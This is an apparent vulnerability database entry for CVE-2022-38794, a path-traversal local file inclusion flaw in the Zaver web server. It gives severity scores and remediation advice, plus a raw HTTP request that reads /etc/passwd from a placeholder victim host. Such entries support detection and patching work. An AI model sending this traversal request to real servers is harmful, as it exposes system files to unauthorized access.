| Title | Zaver - Local File Inclusion |
|---|---|
| Author | pikpikcu |
| Severity | High |
| Impact | This vulnerability can lead to unauthorized access, data leakage, and remote code execution. |
| Remediation | To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations. |
| CVSS Score | 7.5 |
| EPSS Score | 0.20998 |
| CVE ID | CVE-2022-38794 |
| CWE ID | CWE-22 |
| Tags | cve cve2022 lfi zaver zaver_project vuln |
Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.
GET /../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38794.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-38794.pcap
N/AN/A